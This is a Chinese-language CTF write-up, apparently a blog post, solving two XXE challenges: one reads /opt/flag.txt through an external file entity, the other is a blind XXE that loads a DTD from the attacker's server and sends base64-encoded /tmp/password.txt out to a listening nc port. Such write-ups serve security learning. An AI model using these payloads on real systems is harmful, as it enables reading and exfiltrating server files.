Htlab_Weekly_Ctf_13&14

simplexxe

一个简单的xml注入题,源码提示说flag在/opt/flag.txt里面,读一下即可得到flag

payload

<?xml version="1.0" encoding="utf-8"?> 
<!DOCTYPE note [
  <!ENTITY a SYSTEM "file:///opt/flag.txt">
]>
<user><username>&a;</username><password>a</password></user>

blind xxe

源码发现提示

根据题目名字知道这是个无回显的xxe,因为这题没有回显,是blind xxe,所以我们需要构建一条带外信道提取数据,因此我们需要开启一下本地的阿帕奇服务,通过这个外信道把数据传给我们攻击者的服务器并且引用我们的dtd文件

构造的payload如下

写一个dtd文件,目录如图放在www/html的根目录下,内容为

<!ENTITY % file SYSTEM "php://filter/read=convert.base64-encode/resource=file:///tmp/password.txt">
<!ENTITY % all "<!ENTITY &#37; send SYSTEM 'http://10.1.1.100:1221/?%file;'>">

bp里面发送的为

<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE note[
  <!ENTITY % remote SYSTEM "http://10.1.1.100/1.dtd">
  %remote;
  %all;
  %send;
]>

然后本地用nc对我们的1221端口进行监听,来监听从服务器端发过来的请求,对文件内容base64解码得到flag

这里为什么要用php的伪协议来读取数据呢,开始没有用伪协议,并没有读出来,这是因为通过参数实体引用获取到的数据,并不会进行urlencode,并且解析器对URL有一定限制,只要有回车换行(测试发现php中空格、等制表符也不允许),都会被检查为不合法URL,直接拦截这个请求,所以需要用php的伪协议来进行读取。
blind xxe 参考链接

  • 1
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值